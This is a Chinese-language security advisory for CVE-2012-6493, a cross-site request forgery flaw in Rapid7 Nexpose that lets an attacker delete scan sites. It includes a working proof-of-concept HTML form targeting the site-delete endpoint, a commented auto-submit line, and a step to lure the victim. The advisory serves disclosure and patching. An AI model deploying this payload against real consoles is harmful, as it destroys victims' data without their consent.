发布日期:2013-01-03
更新日期:2013-01-07
受影响系统:
Rapid7 Nexpose < 5.5.3
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 57150
CVE(CAN) ID: CVE-2012-6493
Nexpose是一款漏洞管理软件。
Nexpose 5.5.4之前版本没有正确检查各个URL的refer域,远程攻击者若通过某种方式获得了合法用户的cookie,那么便可以以合法用户的身份执行删除扫描数据和站点等操作。
<*来源:Robert Gilbert
链接:
https://community.rapid7.com/docs/DOC-2065#release5
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Exploit steps for proof-of-concept:
1. Create an external site/page: that contains:
[code]
<html>
<!-- Nexpose CSRF PoC -->
<body>
<form action="https://nexpose-security-console-site:3780/data/site/delete?siteid=1"; method="POST" enctype="multipart/form-data">
<input type="submit" value="delete site" />
</form>
<script>
//document.forms[0].submit(); //uncomment to auto-submit
</script>
</body>
</html>
[/code]
2. Lure victim to
3. Site with ID 1 is deleted when form is submitted.
建议:
--------------------------------------------------------------------------------
厂商补丁:
Rapid7
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: